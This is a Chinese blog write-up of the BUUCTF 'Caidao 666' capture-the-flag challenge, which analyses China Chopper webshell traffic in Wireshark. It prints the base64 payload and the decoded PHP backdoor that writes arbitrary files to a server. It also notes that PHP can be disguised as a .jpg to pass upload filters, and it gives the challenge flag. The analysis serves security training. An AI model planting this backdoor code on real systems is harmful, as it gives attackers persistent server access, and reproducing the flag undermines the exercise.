buuctf菜刀666

原创 已于 2025-07-26 11:28:50 修改 · 920 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2025-07-14 10:27:51 首次发布

题目:菜刀666

在这里插入图片描述

解题:

流量分析, 第一步,看题目,说菜刀,菜刀传输是POST
打开wireshark,过滤框输:

http.request.method=="POST"

得到:
在这里插入图片描述
总共就这几个包,找里面含有价值信息的,这里看到其中一个的包length是5033,比别的大不少,追踪一下他TCP流。得到如下图
在这里插入图片描述
里面注意z1和z2,z2之前的信息粘过来如下

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik%2FIjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=RDpcd2FtcDY0XHd3d1x1cGxvYWRcNjY2Ni5qcGc%3D&

上面分为2部分,z1前和z1后,两都base64,对z1前的解个码(base64)(我带了z1的,不要紧,下面不影响结果)
在这里插入图片描述
排版好看点是:
在这里插入图片描述
这段PHP脚本是一个典型的文件上传后门,用于接收外部数据并写入服务器文件系统。他主要功能如下

  1. 禁用错误显示

    @ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
    • 隐藏PHP错误信息,避免暴露漏洞。
    • 取消脚本执行时间限制,允许处理大文件。

  2. 接收并解码参数

    $f = base64_decode($_POST["z1"]);  // 解码目标文件路径
$c = $_POST["z2"];                 // 待写入的内容(经特殊编码)
    • z1参数(Base64编码):解码后得到文件路径(如D:\wamp64\www\upload\6666.jpg)。
    • z2参数:包含待写入文件的实际内容。

  3. 处理待写入内容

    $c = str_replace("\r", "", $c);  // 移除回车符
$c = str_replace("\n", "", $c);  // 移除换行符
$buf = "";
for($i=0; $i<strlen($c); $i+=2) {
    $buf .= urldecode("%" . substr($c, $i, 2));  // 每两个字符进行一次URL解码
}
    • z2的内容转换为原始二进制数据(例如,48656C6C6FHello)。

  4. 写入文件

    echo(@fwrite(fopen($f, "w"), $buf) ? "1" : "0");
    • 将处理后的内容写入指定文件(覆盖模式)。
    • 返回1(成功)或0(失败)。

潜在风险

  • 任意文件写入:攻击者可通过控制z1z2参数,向服务器任意路径写入任意文件(如Webshell、木马)。
  • 伪装文件类型:示例中写入的是.jpg文件,但实际内容可能是PHP代码,用于绕过文件上传过滤。
  • 数据传输隐蔽性:通过Base64和URL编码混淆数据,躲避安全设备检测。

回到题目主线,对z1的url解编码:
在这里插入图片描述给出了一个文件路径:D:\wamp64\www\upload\6666.jpg7
记录一下
下面看z2了。把z2的数据先放到txt里,再用010导入:
第一步:
在这里插入图片描述

第二步:
在这里插入图片描述
第三步,保存,并命名后缀是jpg,得到的图如下
在这里插入图片描述
Th1s_1s_p4sswd_!!!
这…搞到了一个password,是哪个的呢,回题目的文件看看
里面确实有货,用kali的formost分离一下:
在这里插入图片描述

foremost 666666.pcapng
chmod -R 777 output

把文件拉到Windows里,输入上面的口令
在这里插入图片描述
得到:
在这里插入图片描述
flag{3OpWdJ-JP6FzK-koCMAK-VkfWBq-75Un2z}

WLQH
关注
buuctf 菜刀666
weixin_44110537的博客
09-01 2743
追踪Tcp流到第六个发现传递了一张图片 s='填写16进制数据' import binascii out=open('2.jpg','wb') out.write(binascii.unhexlify(s)) out.close() 得到: 很有可能有个加密压缩包 继续查找到第九个流: 果然有个有个压缩包 于是输入密码得到 flag{3OpWdJ-JP6FzK-koCMAK-VkfWBq-75Un2z} ...
buuctf-Misc 题目解答43-45
shelbytt的博客
11-08 314
将这16进制字符复制到一个txt文件中,然后用010 editor导入这个16进制文件,导入方式为hex 保存为1.jpg。任何手段都试了,没有效果,只能从提示上入手,显示一叶障目,说明是有隐写的,可能是修改图片的宽高。解密流量之后,base64里面的内容有一些列的操作,所以http 的响应包里面一定有东西。用Notepad++ 打开,发现了rar压缩包,还发现了一串base64 编码。下载压缩包,拿到菜刀分析流量包,用wiresahrk 打开,追踪http。第三个是一个doc文档,里面是加密的数据。
CTF类题目复现总结-菜刀666 1
weixin_42487326的博客
03-04 416
CTF类题目复现总结-菜刀666 1
BUUCTF菜刀666
末初 · mochu7
10-02 8041
题目地址:https://buuoj.cn/challenges#%E8%8F%9C%E5%88%80666 流量分析 过滤POST的包 http.request.method==POST 在tcp.stream eq 7中发现了大量数据 FF D8开头FF D9结尾,判断为jpg图片,将这些十六进制复制出来,以原始文件流写入文件 #Author:Seanz7 import struct a = open("str.txt","r")#十六进制数据文件 lines = a.read() res =
BUUCTF-菜刀666
m0_63563528的博客
04-01 3554
BUUCTF-菜刀666,使用工具:wireshark,010editor
buuctf--菜刀 666
ncnfjdjjd的博客
02-25 1236
wireshark,http,webshell
BUUCTF 菜刀666 1
YueXuan_521的博客
11-21 1525
BUUCTF 菜刀666 1 ,在下面找到一个zip压缩包,又在倒数第二个数据包的追踪流中,找到pk标识,确认该pcapng文件内有一个zip压缩包。(wireshark 截取的流量中,会截取文件传输对应的流量,也就是说,这个pcapng文件将包括 zip压缩包)在010 Editor中,使用“文件”选项卡的“导入16进制文件”选项,导入刚才新建的txt文件。尝试解压压缩包,需要密码,想起来之前拿到的密码,使用密码解压,得到flag.txt文件。下载附件,解压得到一个.pcapng文件。
BUUCTF 菜刀666
03-31
### 关于BUUCTF菜刀666的解题思路 在CTF竞赛中,“菜刀”通常指代一种Webshell管理工具,用于通过上传的后门文件控制目标服务器。对于BUUCTF中的题目涉及“菜刀666”,其核心在于理解如何利用已知漏洞获取webshell...
buuctf_misc 菜刀666
最新发布
06-13
### 关于BUUCTF Misc中菜刀工具的使用教程或解题思路 在BUUCTF的杂项(Misc)题目中,菜刀工具(Cknife)通常被用来进行文件解析、隐写分析或流量数据提取等操作。以下是对菜刀工具在BUUCTF中的使用技巧和相关解题...
ctf必备-foremost图片隐写提取工具多平台版 隐写术提取工具 mac linux win三版本 附带源码.zip
07-11
foremost图片隐写提取工具多平台版 隐写术提取工具 mac linux win三版本 附带源码
【MISC】BUUCTF_菜刀666
m0_63563528的博客
07-01 757
分析流量,流量分析的对象是菜刀流量,菜刀是常见的连接webshell的工具,连接webshell会有明显的GET或POST请求。拿到题目,给到的是一个流量包,分析流量包之前我会先用note工具查看流量包,看是否对流量分析有帮助。(或GET),分别查看POST和GET流量包。,如下,扫到名为flag.txt的文件,而且是被进行了加密压缩的。用图片显示的密码解压,得到flag,此题完。
buuctf MISC菜刀666
weixin_43326436的博客
07-21 1201
buu
buuctf 杂项 菜刀666
always_green的博客
11-01 831
一些简单题,直接找会话比较长的然后ctrl+f 找flag就秒了,这边每个会话都很长,需要慢慢找,这题要结合菜刀的特征+杂项内容zip和jpg文件头)去分析。010editor文本区域最后也提示我们需要密码,继续查看pcap文件,注意这里只查看标识为本地的包,双击数据包,然后点击数据流,我们只读数据量,因为它可读。下载下来是个PCap流量包,这里可以选择wireshark,我平时喜欢用科来,这是我hw期间遇到的一款流量分析软件,国产的对国人比较友好🤦‍。伪加密,我使用了ZipCenOp,失败。
BUUCTF---misc---菜刀666
2201_75556700的博客
05-04 1138
7、将z2后面的十六进制保存在新建的txt文件中,用010编辑器导入十六进制即txt,后保存为jpg,得到照片。8、接着将流量包分离出压缩包,得到一个flag.txt,需要密码。5、追踪http数据流,发现z2后面是一个jpg文件的文件头。2、题目说是菜刀,联想到http协议的post方法。1、下载附件,在wireshark中分析。6、往下滑,发现提示有txt文件和压缩包。9、使用照片中提示的密码,得到flag。4、打开数据包,发现有个不一样。这里面有一大串的数据包。
BUUCTF-MISC-菜刀666
m0_59028058的博客
03-24 398
通过分析可以发现,z1的参数进行base64解码得到的是一个图片文件路径,z2的参数是一串十六进制编码,从FF D8 FF 可以看出这是 jpg 文件的文件头。5、在该数据包中发现,wireshark 截取的流量中,会截取文件传输对应的流量,也就是说,这个pcapng文件将包括了这个 zip 压缩包。7、解压时发现该被加密了,需要一个密码,想起来之前拿到的一个密码,使用改密码进行解压缩最终得到flag.txt。3、将z2的参数提取出来,放入二进制编辑器中,并新建保存成 .jpg 文件。
buuctf-misc-菜刀666
weixin_46079186的博客
07-21 1557
打开直接过滤 post 请求,发现一处可疑点 右键追踪http 流 发现两处z1&z2,有东西 我们直接输出一下结果,6666.jpg 一张图片 下面的应该就是16 进制转图片了 a = "16进制" import binascii out=open('2.jpg','wb') out.write(binascii.unhexlify(s)) out.close() 以为这个是flag 结果不是 继续看包 追踪流9,是个加密的文件 解密一下,发现一个zip文件, 我们.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值